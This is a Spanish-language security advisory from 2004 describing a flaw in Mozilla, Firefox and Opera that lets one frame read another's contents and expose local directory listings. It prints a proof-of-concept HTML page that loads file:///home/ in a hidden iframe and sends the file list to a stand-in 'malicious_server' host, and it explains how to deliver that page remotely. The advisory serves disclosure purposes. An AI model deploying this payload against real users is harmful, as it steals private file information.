Esta página es un servicio gratuito de Video Soft BBS - SUBSCRIBASE en nuestras listas de correo.
 

Busque su tema:

VSantivirus  Internet
Proporcionado por FreeFind

Video Soft BBS
Menú Principal
Anti Trojans
Antivirus
Hoaxes
Subscripciones
Otro software
Artículos
Links
Sugerencias
Sobre el BBS
Direcciones
Galería
Chat

       

Revelación de información en Mozilla, Firefox y Opera
 
VSantivirus No. 1609 Año 8, jueves 2 de diciembre de 2004

Revelación de información en Mozilla, Firefox y Opera
http://www.vsantivirus.com/vul-011204.htm

Por Angela Ruiz
angela@videosoft.net.uy


Existe un problema en algunos navegadores, en donde un FRAME puede obtener acceso a los atributos de otro FRAME (o IFRAME).

Esto ha sido comprobado en Mozilla, Firefox y Opera. Microsoft Internet Explorer no es afectado por esta debilidad.

La explotación de este fallo, podría revelar información local a un atacante.

Se ha publicado la siguiente prueba de concepto (PoC):

<html>
<body onLoad="

list_files='';
for(i=0;i<local_files.document.links.length;i++)
{list_files+=local_files.document.links.item(i);}
alert(list_files);
//send list_files at malicious_server

document.location.href=
'http://malicious_server/grab.php?list='+list_files;

">
<iframe name="local_files" src="file:///home/" height=0
width=0></iframe>

</body>
</html>

Un servidor malicioso puede obtener el contenido del directorio "/home/" (o "c:\Document and Setting\" en sistemas Windows), y de ese modo tener conocimiento de una serie de archivos de usuario presentes en el sistema.

También podría ser posible conocer si un determinado programa se encuentra en el equipo afectado, con la intención de sacar provecho de ello en un posterior ataque.

De todos modos, esto no puede ser explotado en forma directa por un sitio Web malicioso, ya que la página es abierta desde un camino local (file :/ /localpath/code.htm, donde code.htm es el ejemplo anterior), desde que el iframe "local_files" pertenece a un dominio local.

Con Internet Explorer este código no funciona a nivel local.

Para que un atacante saque provecho de esto, debe hacer que el usuario abra http :/ /maliciuos_server/code.htm, y que el servidor malicioso responda con una página conteniendo un campo "Content-Type" desconocido (por ejemplo "text/html." con un punto al final), para que el navegador muestre una ventana de diálogo con algunas opciones (Abrir, Guardar, Cancelar).

Seleccionando "Abrir" para ver la página, esta será descargada y abierta desde una ubicación local, permitiendo que el código en JavaScript se ejecute en un contexto local (lo mismo ocurrirá si selecciona "Guardar" y luego abre la página).

En Opera, para que funcione este método de explotación remota, debe estar configurado como aplicación por defecto para abrir y guardar archivos.

No existe solución al momento actual, de parte de los vendedores involucrados, quienes han sido avisados el 24 de noviembre pasado, según el autor de este descubrimiento.

Son afectados los siguientes productos:

- Firefox 1.0 (y anteriores)
- Mozilla 1.7 (y anteriores)
- Opera 7.54 (y anteriores)


Créditos:

Giovanni Delvecchio


Referencias:

Disclosure of file system information in Mozilla Firefox and Opera Browser
http://www.securityfocus.com/archive/1/382855




(c) Video Soft - http://www.videosoft.net.uy
(c) VSAntivirus - http://www.vsantivirus.com

 

Copyright 1996-2004 Video Soft BBS